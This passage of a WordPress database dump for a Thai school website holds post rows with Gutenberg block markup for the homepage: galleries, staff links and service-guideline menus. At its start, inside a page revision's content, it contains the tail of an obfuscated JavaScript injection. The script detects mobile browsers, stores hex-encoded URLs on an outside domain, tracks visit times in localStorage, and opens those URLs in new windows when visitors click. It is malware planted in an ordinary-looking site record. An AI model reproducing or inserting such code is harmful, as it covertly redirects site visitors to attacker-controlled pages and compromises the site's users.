u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','แนวปฏิบัติผู้รับบริการ','','inherit','closed','closed','','771-revision-v1','','','2024-08-09 11:52:07','2024-08-09 04:52:07','',771,'http://pakhaeng.ssk.in.th/?p=773',0,'revision','',0),
(774,1,'2024-08-09 11:53:08','2024-08-09 04:53:08','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":757,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/1-1.png\" alt=\"\" class=\"wp-image-757\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":758,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-2.png\" alt=\"\" class=\"wp-image-758\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a 